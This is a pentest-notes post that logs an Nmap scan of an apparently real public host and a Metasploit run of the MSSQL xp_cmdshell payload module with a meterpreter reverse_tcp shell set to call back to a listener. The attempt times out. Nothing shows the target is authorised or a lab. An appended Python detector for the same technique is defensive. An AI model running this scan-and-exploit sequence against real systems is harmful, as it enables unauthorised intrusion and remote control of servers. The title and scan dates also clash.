Pentest Notes 2013-07-13: windows/mssql/mssql_payload
Run a scan first
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间
NSE: Loaded 49 scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [1000 ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script Scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE        VERSION
21/tcp   open   ftp            Microsoft ftpd
25/tcp   closed smtp
80/tcp   open   http           Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_html-title: Site doesn't have a title (text/html).
110/tcp  closed pop3
3306/tcp open   mysql          MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: B@Y";By^J5k<*[k+0O~O
3389/tcp open   microsoft-rdp  Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 50.00 ms 203.171.239.*
Read data files from: D:\metasploit\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)
Now to go after the box
Welcome to the Metasploit Web Console!
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 296 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 296 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload
Name: Microsoft SQL Server Payload Execution
Version: 9669
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
PASSWORD                       no        The password for the specified username
RHOST                          yes       The target address
RPORT         1433             yes       The target port
USERNAME      sa               no        The username to authenticate as
UseCmdStager  true             no        Wait for user input before returning from exploit
VERBOSE       false            no        Enable verbose output
Payload information:
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.osvdb.org/557
http://www.securityfocus.com/bid/1281
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
http://www.osvdb.org/15757
http://www.securityfocus.com/bid/4797
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf
>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options
Module options:
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
PASSWORD                       no        The password for the specified username
RHOST                          yes       The target address
RPORT         1433             yes       The target port
USERNAME      sa               no        The username to authenticate as
UseCmdStager  true             no        Wait for user input before returning from exploit
VERBOSE       false            no        Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id Name
-- ----
0 Automatic
>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit
[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.
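The module description above outlines the chain this exploit depends on: xp_cmdshell spawning a shell under sqlservr.exe, debug.com writing the executable, and the file left behind in System32. As an added detection example (not part of the original post or of the Metasploit module), the following host-side logic walks constructed, Sysmon-style process-creation records and reports anything in SQL Server's process tree together with the traits of that chain; the field names and sample values are assumptions.

```python
"""Detection for the xp_cmdshell -> cmd.exe -> debug.exe file-drop chain.
EVENTS are constructed Sysmon-style process-creation records, not real data."""
import re

EVENTS = [  # constructed sample data (pid/ppid chosen arbitrarily)
    {"pid": 1201, "ppid": 988,
     "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo test >> C:\WINDOWS\system32\a.txt"},
    {"pid": 1340, "ppid": 1201,
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\debug.exe",
     "cmdline": r"debug < C:\WINDOWS\system32\a.txt"},
    {"pid": 2001, "ppid": 500,  # admin shell not under SQL Server
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo hello >> C:\WINDOWS\system32\b.txt"},
]

SQLSERVR = re.compile(r"\\sqlservr\.exe$", re.I)
DEBUG = re.compile(r"\\debug\.(exe|com)$", re.I)
# Output redirected into System32, where the module says its payload is left.
SYSTEM32_WRITE = re.compile(r">{1,2}\s*\"?[a-z]:\\windows\\system32\\", re.I)


def under_sql_server(event, by_pid):
    """True if sqlservr.exe is an ancestor, following the ppid chain we hold."""
    seen = set()
    while event is not None and event["pid"] not in seen:
        seen.add(event["pid"])
        if SQLSERVR.search(event["parent"]):
            return True
        event = by_pid.get(event["ppid"])
    return False


def indicators(event):
    """Per-event traits of the technique, independent of process lineage."""
    hits = []
    if DEBUG.search(event["image"]):
        hits.append("debug_exe_launch")
    if SYSTEM32_WRITE.search(event["cmdline"]):
        hits.append("system32_redirect_write")
    return hits


def scan(events):
    """Map pid -> indicators for every event inside SQL Server's process tree;
    a shell descending from sqlservr.exe is itself the xp_cmdshell signal."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: ["sqlservr_process_tree"] + indicators(e)
            for e in events if under_sql_server(e, by_pid)}
```

The benign shell writing into System32 is deliberately left unreported by `scan`, because the redirect on its own is common administrative noise; it only becomes interesting when SQL Server is in the lineage.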